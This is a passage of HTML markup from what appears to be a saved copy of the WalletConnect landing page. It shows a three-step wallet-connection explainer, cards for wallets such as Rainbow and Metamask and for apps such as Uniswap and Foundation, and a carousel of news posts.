                <h3 class="styles_heading__YwDIe styles_heading3__iwGXC styles_colorWhite__UuUMU styles_title__SJWU5">We make it easy for you to plug into web3.</h3><img alt="Synth 3d graphics" src="images/synth.648fc923.jpeg" width="2520" height="1760" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_image__1xiuM" loading="lazy"><div class="styles_curious__Lm4h_">
                    <span class="styles_text__LlfBJ styles_text1___WCK1 styles_colorWhite__UuUMU ">Curious about</span>
                    <div class="styles_tag__YN7uo styles_green__V7BKd undefined">
                        <span class="styles_text__LlfBJ styles_text1___WCK1 styles_colorGreen__TTehu ">DeFi</span>
                    </div>
                    <div class="styles_tag__YN7uo styles_orange__dFTrm undefined">
                        <span class="styles_text__LlfBJ styles_text1___WCK1 styles_colorOrange__iZABN ">NFTs</span>
                    </div>
                    <div class="styles_tag__YN7uo styles_cyan__SM7Uo undefined">
                        <span class="styles_text__LlfBJ styles_text1___WCK1 styles_colorCyan__qstTi ">DAOs</span>
                    </div>
                </div>
                <h3 class="styles_heading__YwDIe styles_heading3__iwGXC styles_colorWhite__UuUMU styles_tagline__pTP6u">With WalletConnect, you can connect your wallet with hundreds of apps, opening the doors to a new world of web3 experiences.</h3>
            </section>
            <section class="styles_section__1jd5K">
                <div class="styles_card__bfuIs styles_gradient__J_Gtp styles_roundedLg__2FT1O styles_paddingMd__rPRrm styles_containerCard__8jYLl">
                    <div class="styles_accordionContainer__SR2FZ">
                        <a class="styles_accordionAnchor__cUzSb" href="/accordion">
                            <div class="styles_card__bfuIs styles_dark__Lr7va styles_roundedMd__aAqXZ styles_paddingLg__LziPZ styles_accordionCard__S2fnJ styles_activeAccordionCard__cSUuR" id="accordionCard0">
                                <div class="styles_accordionCardTitle__6RLrc">
                                    <h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU ">Click ‘Connect Wallet’</h4>
                                    <div class="styles_accordionCardBadge__ZNW9s">
                                        <svg width="36" height="36" viewbox="0 0 36 36" class="styles_progressSvg__2L_Gf"><circle class="styles_progressCircle___QgEo" cx="18" cy="18" r="17.5" fill="none" stroke="#3396ff" stroke-width="1.2" pathlength="100"/></svg>
                                        <span class="styles_numeric__16iEp styles_numeric5__mrdQg styles_colorWhite__UuUMU ">1</span>
                                    </div>
                                </div>
                                <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorGrey__ZiDfp styles_accordionText__y3Kt8">Locate the button on your desired app, as this will enable you to log in with your preferred wallet.</p>
                            </div>
                        </a>
                        <a class="styles_accordionAnchor__cUzSb" href="/accordion">
                            <div class="styles_card__bfuIs styles_dark__Lr7va styles_roundedMd__aAqXZ styles_paddingLg__LziPZ styles_accordionCard__S2fnJ false" id="accordionCard1">
                                <div class="styles_accordionCardTitle__6RLrc">
                                    <h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorGrey__ZiDfp ">Scan the QR code or find your wallet</h4>
                                    <div class="styles_accordionCardBadge__ZNW9s">
                                        <span class="styles_numeric__16iEp styles_numeric5__mrdQg styles_colorWhite__UuUMU ">2</span>
                                    </div>
                                </div>
                                <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorGrey__ZiDfp styles_accordionText__y3Kt8">Initiate the connection so that WalletConnect gets to work in the background, linking your wallet and app.</p>
                            </div>
                        </a>
                        <a class="styles_accordionAnchor__cUzSb" href="/accordion">
                            <div class="styles_card__bfuIs styles_dark__Lr7va styles_roundedMd__aAqXZ styles_paddingLg__LziPZ styles_accordionCard__S2fnJ false" id="accordionCard2">
                                <div class="styles_accordionCardTitle__6RLrc">
                                    <h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorGrey__ZiDfp ">Start exploring!</h4>
                                    <div class="styles_accordionCardBadge__ZNW9s">
                                        <span class="styles_numeric__16iEp styles_numeric5__mrdQg styles_colorWhite__UuUMU ">3</span>
                                    </div>
                                </div>
                                <p class="styles_text__LlfBJ styles_text2__xsLxi styles_colorGrey__ZiDfp styles_accordionText__y3Kt8">You can now interact with the app. Three simple steps is all it takes.</p>
                            </div>
                        </a>
                        <button class="styles_button__gAHKk styles_fillBlue__7AYTO styles_actionBtn__QKP1j">
                            <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Try it out now</span>
                        </button>
                    </div>
                    <div class="styles_container__lcSzG styles_animationContainer__ko4E5 "><img alt="abstract shapes" src="images/product_bg1.bccf6383.jpeg" width="1800" height="1200" decoding="async" data-nimg="future" class="styles_image__DSP3n" loading="lazy"><img alt="WalletConnect connect prompt" id="styles_animationConnectWallet__AhwPf" src="images/connect_wallet.f249ca36.png" width="2637" height="1724" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_animationItem__pcZs9 animationItem0" loading="lazy"><img alt="WalletConnect QR Modal" id="styles_animationItemQrModal___ZE20" src="images/modal_qr.f7946f6c.png" width="1200" height="1600" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_animationItem__pcZs9 animationItem1" loading="lazy"><img alt="WalletConnect Linking Modal" id="styles_animationItemLinkingModal__HGgE4" src="images/modal_linking.5bb87354.png" width="1200" height="1600" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_animationItem__pcZs9 animationItem1" loading="lazy"><img alt="Mirror Widget" id="styles_animationItemMirror__9JP8T" src="images/mirror_widget.3bc5e201.png" width="1520" height="1432" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_animationItem__pcZs9 animationItem2" loading="lazy"><img alt="Shapeism Widget" id="styles_animationItemShapeism__xVWeq" src="images/shapeism_widget.6862f15d.png" width="1113" height="1432" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_animationItem__pcZs9 animationItem2" loading="lazy"><img alt="Uniswap Widget" id="styles_animationItemUniswap__JE4mo" src="images/uniswap_widget.31a66be9.png" width="1460" height="872" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_animationItem__pcZs9 animationItem2" loading="lazy"></div>
                </div>
            </section>
            <section class="styles_section__RfEYj">
                <div class="styles_heading__uRv8i">
                    <h3 class="styles_heading__YwDIe styles_heading3__iwGXC styles_colorWhite__UuUMU styles_title__T5hh_">Looking for a wallet?</h3>
                    <div class="styles_headingAction__QEGCg">
                        <a href="https://explorer.walletconnect.com/registry?type=wallet">
                            <button class="styles_button__gAHKk styles_ghost__6zb7F ">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View all wallets</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                        </a>
                    </div>
                </div>
                <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedLg__2FT1O styles_paddingNone__s1e3U styles_card__4Xzsc">
                    <div class="styles_cardHeader__5L_Mj"><img alt="Rainbow" src="images/rainbow_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_cardIcon__N9Hr0" loading="lazy"><h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_cardTitle__OjBpL">Rainbow</h4>
                        <a href="https://rainbow.me/" target="_blank" rel="noopener noreferrer">
                            <button class="styles_button__gAHKk styles_fillBlue__7AYTO styles_cardButton___AkWf">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_textIconRight__7obUS">Get Rainbow</span><img alt="Arrow right icon" src="fonts/arrow_right_white.1e8e5748.svg" width="7" height="12" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                        </a>
                    </div><img alt="Rainbow" src="images/rainbow_widget.b94216a7.png" width="1140" height="1140" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_cardWidget__l0yX1" loading="lazy"></div>
                <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedLg__2FT1O styles_paddingNone__s1e3U styles_card__4Xzsc">
                    <div class="styles_cardHeader__5L_Mj"><img alt="Metamask" src="images/metamask_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_cardIcon__N9Hr0" loading="lazy"><h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_cardTitle__OjBpL">Metamask</h4>
                        <a href="https://metamask.io/" target="_blank" rel="noopener noreferrer">
                            <button class="styles_button__gAHKk styles_fillBlue__7AYTO styles_cardButton___AkWf">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_textIconRight__7obUS">Get Metamask</span><img alt="Arrow right icon" src="fonts/arrow_right_white.1e8e5748.svg" width="7" height="12" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                        </a>
                    </div><img alt="Metamask" src="images/metamask_widget.2a39575f.png" width="1140" height="1140" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_cardWidget__l0yX1" loading="lazy"></div>
                <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedLg__2FT1O styles_paddingNone__s1e3U styles_card__4Xzsc">
                    <div class="styles_cardHeader__5L_Mj"><img alt="Argent" src="images/argent_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_cardIcon__N9Hr0" loading="lazy"><h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_cardTitle__OjBpL">Argent</h4>
                        <a href="https://www.argent.xyz/" target="_blank" rel="noopener noreferrer">
                            <button class="styles_button__gAHKk styles_fillBlue__7AYTO styles_cardButton___AkWf">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU styles_textIconRight__7obUS">Get Argent</span><img alt="Arrow right icon" src="fonts/arrow_right_white.1e8e5748.svg" width="7" height="12" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                        </a>
                    </div><img alt="Argent" src="images/argent_widget.d9075557.png" width="1520" height="1520" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_cardWidget__l0yX1" loading="lazy"></div>
            </section>
            <section class="styles_section__m3qDq">
                <h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_title__fHLwM">We’re supported by over 170 wallets.</h4>
                <div class="styles_ticker__ps147">
                    <div class="styles_content__dZufc styles_slideToLeft__skudD"><img alt="/images/unstoppable_icon.png" src="images/unstoppable_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/rainbow_icon.png" src="images/rainbow_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/spot_icon.png" src="images/spot_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/trust_icon.png" src="images/trust_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/zengo_icon.png" src="images/zengo_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/assure_icon.png" src="images/assure_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/argent_icon.png" src="images/argent_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/imtoken_icon.png" src="images/imtoken_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/metamask_icon.png" src="images/metamask_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/pillar_icon.png" src="images/pillar_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/unstoppable_icon.png" src="images/unstoppable_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/rainbow_icon.png" src="images/rainbow_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/spot_icon.png" src="images/spot_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/trust_icon.png" src="images/trust_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/zengo_icon.png" src="images/zengo_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/assure_icon.png" src="images/assure_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/argent_icon.png" src="images/argent_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/imtoken_icon.png" src="images/imtoken_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/metamask_icon.png" src="images/metamask_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"><img alt="/images/pillar_icon.png" src="images/pillar_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__zHI9n" loading="lazy"></div>
                </div>
            </section>
            <section class="styles_section__hHhFp">
                <div class="styles_heading__0Nhaw">
                    <h3 class="styles_heading__YwDIe styles_heading3__iwGXC styles_colorWhite__UuUMU styles_title__vPH4n">Want to connect with an app?</h3>
                    <div class="styles_headingAction__9wHLL">
                        <a href="https://explorer.walletconnect.com/registry?type=dapp">
                            <button class="styles_button__gAHKk styles_ghost__6zb7F ">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View all apps</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                        </a>
                    </div>
                </div>
                <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedLg__2FT1O styles_paddingNone__s1e3U styles_card__aY3PO">
                    <div class="styles_cover__FPA9Q"><img alt="Uniswap.  background" src="fonts/uniswap_bg.9a39fe5e.svg" width="600" height="378" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_coverImage__Kzq6e" loading="lazy"><img alt="Uniswap.  widget" src="images/uniswap_widget.31a66be9.png" width="1460" height="872" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_widget__DQ3P3" loading="lazy"></div>
                    <div class="styles_actions__hTZGw"><img alt="Uniswap.  icon" src="images/uniswap_icon.0cbea3fe.png" width="240" height="240" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__V54nj" loading="lazy"><a href="https://uniswap.org/" target="_blank" rel="noopener noreferrer">
                            <button class="styles_button__gAHKk styles_fillBlue__7AYTO ">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Open</span>
                            </button>
                        </a>
                    </div>
                    <div class="styles_text__YO1jo">
                        <h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorGrey__ZiDfp ">
                            <span class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU ">Uniswap.
                            </span>Swap, earn, and build on the leading decentralized crypto trading protocol.</h4>
                    </div>
                </div>
                <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedLg__2FT1O styles_paddingNone__s1e3U styles_card__aY3PO">
                    <div class="styles_cover__FPA9Q"><img alt="Foundation.  background" src="fonts/foundation_bg.96939fda.svg" width="600" height="378" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_coverImage__Kzq6e" loading="lazy"><img alt="Foundation.  widget" src="images/foundation_widget.9fe7b81d.png" width="2240" height="1432" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_widget__DQ3P3" loading="lazy"></div>
                    <div class="styles_actions__hTZGw"><img alt="Foundation.  icon" src="images/foundation_icon.149c9e24.png" width="240" height="240" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__V54nj" loading="lazy"><a href="https://foundation.app/" target="_blank" rel="noopener noreferrer">
                            <button class="styles_button__gAHKk styles_fillBlue__7AYTO ">
                                <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorWhite__UuUMU ">Open</span>
                            </button>
                        </a>
                    </div>
                    <div class="styles_text__YO1jo">
                        <h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorGrey__ZiDfp ">
                            <span class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU ">Foundation.
                            </span>Create, collect and sell NFTs.</h4>
                    </div>
                </div>
            </section>
            <section class="styles_section__qwzFB">
                <h4 class="styles_heading__YwDIe styles_heading4__h0dFu styles_colorWhite__UuUMU styles_title__N2X5o">We connect you with more than 450 apps.</h4>
                <div class="styles_ticker__ps147">
                    <div class="styles_content__dZufc styles_slideToRight__WZrOp"><img alt="/images/aave_icon.png" src="images/aave_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/uniswap_icon.png" src="images/uniswap_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/opensea_icon.png" src="images/opensea_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/twitter_icon.png" src="images/twitter_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/rarible_icon.png" src="images/rarible_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/compound_icon.png" src="images/compound_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/instagram_icon.png" src="images/instagram_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/matcha_icon.png" src="images/matcha_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/foundation_icon.png" src="images/foundation_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/mirror_icon.png" src="images/mirror_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/aave_icon.png" src="images/aave_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/uniswap_icon.png" src="images/uniswap_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/opensea_icon.png" src="images/opensea_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/twitter_icon.png" src="images/twitter_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/rarible_icon.png" src="images/rarible_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/compound_icon.png" src="images/compound_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/instagram_icon.png" src="images/instagram_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/matcha_icon.png" src="images/matcha_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/foundation_icon.png" src="images/foundation_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"><img alt="/images/mirror_icon.png" src="images/mirror_icon.png" width="80" height="80" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_icon__C3eLy" loading="lazy"></div>
                </div>
            </section>
            <section class="styles_section__BNoNS">
                <div class="styles_heading__LWQPJ">
                    <h3 class="styles_heading__YwDIe styles_heading3__iwGXC styles_colorWhite__UuUMU ">Keep up with our news.</h3>
                    <div class="styles_headingAction__FFaYH">
                        <button class="styles_button__zk_LZ styles_outlineGrey__sN77O styles_fab__2SH7q"><img alt="Arrow left" src="fonts/arrow_left_white.f7957bf6.svg" width="7" height="12" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                        <button class="styles_button__zk_LZ styles_outlineGrey__sN77O styles_fab__2SH7q"><img alt="Arrow right" src="fonts/arrow_right_white.1e8e5748.svg" width="7" height="12" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                    </div>
                </div>
                <div class="use-spring-carousel-main-wrapper" data-testid="use-spring-carousel-wrapper" style="display:flex;position:relative;width:100%;height:100%">
                    <div class="use-spring-carousel-track-wrapper" data-testid="use-spring-carousel-animated-wrapper" style="display:flex;position:relative;touch-action:pan-y;flex-direction:row;width:calc(100% - 0px);height:100%;left:0px;transform:none">
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="Say Hello to Chat: A First Look at Our New API" src="images/1_bCZiDop59JQDbKsPRxx26Q.jpeg" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">Say Hello to Chat: A First Look at Our New API</h5>
                                <a href="https://medium.com/p/f706ebf63a28" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="Calling All Devs: The WalletConnect v2.0 Sign Beta is Over!" src="images/1_PZyTm4Yr44qsG_X-UNLJZA.jpeg" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">Calling All Devs: The WalletConnect v2.0 Sign Beta is Over!</h5>
                                <a href="https://medium.com/p/d7bb786cdd93" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="Empowering the App Experience with WalletConnect" src="images/1_bCFaVMwDeC6HgEp64VCN5A.png" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">Empowering the App Experience with WalletConnect</h5>
                                <a href="https://medium.com/p/b0672bded1df" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="Empowering the Wallet Experience with WalletConnect" src="images/1_0s2vL6pt26H8E-sk29IdOw.png" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">Empowering the Wallet Experience with WalletConnect</h5>
                                <a href="https://medium.com/p/447391e1cb9b" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="What’s New with WalletConnect: Integrations, Events, and Getting Started with the v2.0 Sign SDK" src="images/1_4W51EyfhmTg_QoFm-ftYYA.png" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">What’s New with WalletConnect: Integrations, Events, and Getting Started with the v2.0 Sign SDK</h5>
                                <a href="https://medium.com/p/c5b25e6db6ba" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="Building a Messaging Protocol for Web3" src="images/1_p1Z23m8IRrQUpgK37OWGBg.jpeg" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">Building a Messaging Protocol for Web3</h5>
                                <a href="https://medium.com/p/4e6103679f" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
                                        <span class="styles_anchor__OG73y styles_anchor2__5Nde8 styles_colorBlue__yosSC styles_textIconRight__7obUS">View</span><img alt="Arrow right blue" src="fonts/arrow_right_blue.2e2cf95d.svg" width="24" height="24" decoding="async" data-nimg="future" class="styles_image__9dfzG  undefined" loading="lazy"></button>
                                </a>
                            </div>
                        </div>
                        <div class="use-spring-carousel-item" data-testid="use-spring-carousel-item-wrapper" style="display:flex;position:relative;margin-right:20px">
                            <div class="styles_card__bfuIs styles_transparent__jKb9d styles_roundedMd__aAqXZ styles_paddingNone__s1e3U styles_card__Vb79c"><img alt="Beginner’s Guide to the WalletConnect v2.0 Sign SDK for JavaScript Developers" src="images/1_pH_IPZfx9SSI2NfaCypTVw.png" width="320" height="180" decoding="async" data-nimg="future" class="styles_image__9dfzG  styles_thumbnail__1O_CK" loading="lazy"><h5 class="styles_heading__YwDIe styles_heading5__CHcH1 styles_colorWhite__UuUMU styles_cardTitle__J__eo">Beginner’s Guide to the WalletConnect v2.0 Sign SDK for JavaScript Developers</h5>
                                <a href="https://medium.com/p/107f9eebb29b" target="_blank" rel="noopener noreferrer">
                                    <button class="styles_button__gAHKk styles_ghost__6zb7F styles_button__UoPq1">
